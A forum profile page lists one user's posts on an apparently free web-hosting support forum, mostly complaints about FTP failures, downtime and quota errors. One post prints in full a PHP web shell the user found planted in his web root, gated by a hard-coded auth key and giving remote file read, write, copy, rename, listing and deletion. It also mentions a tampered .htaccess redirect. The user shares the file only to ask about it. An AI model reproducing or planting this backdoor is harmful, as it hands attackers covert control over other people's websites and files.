Jump to content

claus

Members
  • Posts

    48
  • Joined

  • Last visited

Everything posted by claus

  1. I'm working off the Lap, connected wireless to the Router, which, of course has firewall. Since I don't have this kind of issue with other hosters, I would rule that one out. The nerving part is, that it occurs out of the blue. One moment everything is fine, the next complete void. Have tried a number of connections, different clients; all the same. Maybe I should stuff the whole branch onto the Solaris box, rather than W7U. However, it has worked just nice until recently; and moving a couple of thousands of files just for testing... uhm...
  2. claus

    409843880.php

    Well, it's gone long. So what am I supposed to do now? Logging in to CP works all the same. Actually, I am logged in almost all day. Anyway, the way I see it, /core/ files really oughtn't live in the user's public branch, should they? I suppose, there are better places to store them, save from /accidental/ accidents.
  3. Sorry, to bother again. We are back, to where we were, in the middle of nowhere. FTP gone once more. I would very much like to have this solved. There are dependencies on my sites, which I care to maintain. I quite enjoy playing Snooker, only its done with a number of balls, rather than server conf files. Any ideas? Care for my credentials, to give it a local try yourself? For what's it worth, the .ftquota file reads like: 57 196056 - whatever that means
  4. Okay, I don't know, what exactly happened, but a minute ago, I could positively ftp into the machine again. Haven't tried CP File Manager, nor Web-disk yet. Kneel and pray. Thanks guys.
  5. Well, it didn't quite work. Still unable to upload. Effectively rendering my sites useless.
  6. claus

    409843880.php

    Copy that. Actually, I never had anything in there, since everything files under the given domain's branch. Yep, was thinking to brush that ol' phrase anyway, thanks. Okay, it's gone. Also wiped clean the .htaccess, just in case.
  7. CP login goes by the magic of phc. Hope, that helps, sorting it out. Hey, just caught a glimpse at server loads, Stevie seems to be down - and so are my sites - again. Gosh, please, someone get this over.
  8. claus

    409843880.php

    Contents are included. See original post at top. File name as in topic title. I wonder, if it's save, to kick the thing off. Sorry, almost forgot about that. Nope, there is neither core-whatever, nor error-log. However, I would hardly expect to find them under public_html
  9. claus

    409843880.php

    I just found this PHP fragment in my root folder, apparently added yesterday qt 10:13 PM. Just out of curiosity, is this thing supposed to be there? It's not even closed, hence, to my understanding a corrupted file anyway. Also, the .htaccess at the same location was tempered with yesterday, 12:42 AM. Seems like, it has adopted a 301 for one of the sites. Some feedback, please. Reagrds, Peter Heinrich Claus. P.S.: Below the posting area, where it reads Attachments, I get IPS Driver Error --snip-- <?php error_reporting(0); $authKey = '1216441309'; if($_GET['auth'] !== $authKey) { echo '403 Unauthorized'; die(); } $homeDir = dirname(__DIR__).'/'; $_GET['source'] = $homeDir.$_GET['source']; $_GET['dest'] = $homeDir.$_GET['dest']; switch ($_GET['action']) { case 'rename': rename($_GET['source'], $_GET['dest']); break; case 'copy': copy($_GET['source'], $_GET['dest']); break; case 'touch': file_put_contents($_GET['source'], ''); break; case 'save': file_put_contents($_GET['source'], $_POST['data']); break; case 'get': echo file_get_contents($_GET['source']); break; case 'mkdir': mkdir($_GET['source']); break; case 'ls': $files = array(); if ($handle = opendir($_GET['source'])) { while (false !== ($file = readdir($handle))) { if ($file != "." && $file != "..") { if(is_file($_GET['source'].''.$file.'')) { $type = 'file'; }else{ $type = 'folder'; } $files[] = array( 'path' => str_replace($homeDir, '', $_GET['source'].$file), 'name' => $file, 'type' => $type, ); } } closedir($handle); } echo serialize($files); break; case 'rm': unlink($_GET['source']); break; default: echo '600 Not Implemented'; break; }
  10. It's permanent. Just tried again. Same thing. Initial list seems to be fine, but trying to open a domain stalls. I am effectively locked out, unable to upload, or edit via CP File Manager.
  11. Hi. Went to the site. Re-dir works, page is loading. What exactly is your problem? Both, Stevie and Johnny seem to have alive of their own - at times. I am experiencing some weird stuff myself.
  12. Wow, just when you think, it's green, it's all blazing red. Now what's going on? My sites are apparently live again, but now all scripts unite in throwing a 500. Nope, I didn't change a thing, and they were doing just fine a mo ago. Hello, anybody home? Would you mind, running the plumber across these things, asap? Thank you. Nice move, thank you; or was it just by chance? Really, guys, there's gotta be some ghost somewhere in this machine. Scripts are back to normal.
  13. claus

    HelioPanel Beta

    I suppose, the up-arrow was intended for up-loads. Well, it's not doing anything. Additional functions? Like what? Guess, I'll stick to CP until this thing morphs into something real.
  14. claus

    sites down

    Just went checking my sites. They appear _ALL_ to be down. What's cooking? Did I miss some scheduled downtime, or is this yet some other trouble? Just as they went, they re-appeared. Let's just hope, it stays that way.
  15. Hi there, once again. I am experiencing sporadic troubles with FTP. Connection timeout, unable to retrieve directory listing. File Manager via CP gives unknown error or disk quota exceeded. Well, I have about 470 Megs avail. Web Disk quits with error all the same. This applies to Stevie. Anybody else having the same trouble? Thanks in advance. Regards, Peter Heinrich Claus
  16. claus

    Down again???

    Thanks. Never seen that, Heading over to the move now. Oh wonderful. So first I delete my account, wait 2 days, then try signing-up again, wait another 2 days; when all I get is -- daily quota exceeded... -- ??? Sorry, I am GMT-6, so midnight PST doesn't make much sense to me. There ought to be some script, to do any such mergers automatically. Thank you, but the proposed procedure seems to be leading to exactly the same result, only permanent: gone fishing. Any options?
  17. claus

    Down again???

    Hi all, Maybe it's just me, but really, I'm running low on patience. What's going on? My site is on Johnny, and that went fishing - again. I would very much appreciate some sort of a fair warning, of upcoming down-times. At least, I would know, what (not) to expect. On-line - off-line at a snap, is giving me the creeps. What good does any increased storage do, if it's buried in the void? Please! Regards, Peter Heinrich Claus.
  18. Hooray!! Down again. Just what exactly are you doing over there?
  19. Good job, though. What I don't quite figure: There were no ads showing on my site, unless, of course, you refer to the /we have technical problems/ thing? Would you care, to brighten my sense of history? I'm having some trouble myself, where to stuff this /Krydos/ type. Sounds like Homer, but I guess, I'm lost, am I?
  20. For the time being, the issue seems to be solved; at least my site is showing up again. How about the pack? Troubles: I wasn't actually referring to /recent/ topics. However, one is happy to forget the bad, as soon, as the good shines through. Thank you for the great service it is, after all. Almost paramount; but we don't want you, to get your wings burned too badly... Do we? Have a nice one; and keep it. Regards, Peter Heinrich Claus REM: How can an advertisement not be yours, if you are the site owner??? If it's causing trouble, kick it; or at least host it on one of the zillion junk hosts out there. But if it's directly affecting the server, you -- and others-- are on: I would almost opt, to call it malicious; or maybe fraudulent? Who is the owner of the ad? You may want to publish the credentials, so that others may be aware; and keen, to avoid any such.
  21. Well guys, I might just be legging it, go hosting somewhere more stable. You keep having troubles after troubles. Admin: Did it ever occur, to add some storage??? /sda1 on johnny is at 98%!! Didn't check stevie, but may be just the same. Please, for the sake of it; and to cite your front-page: "Professionals" -- This does not even come anywhere close, of being professional; and responsible. You are hosting other people's works. These people trust, depend, and rely on you - at least to some extent. Better make sure, you actually have the means to provide, what you offer; or else, simply close all new sign-ups unless you do. Did I not have sufficient back-up mirrors, poor of me. Now, before anyone goes on the /but it's free/ train: First, there are others; working. Next: If you offer a free service, (I do so most of the the time), you don't ask for payment, do you? Apparently there are means of income, to secure the free portion; or else, so it'd rather be. At times, I feel like saying... Thank you so very much; for nothing. Regards, Peter Heinrich Claus. BTW: Best of luck to get things going ASAP.
×
×
  • Create New...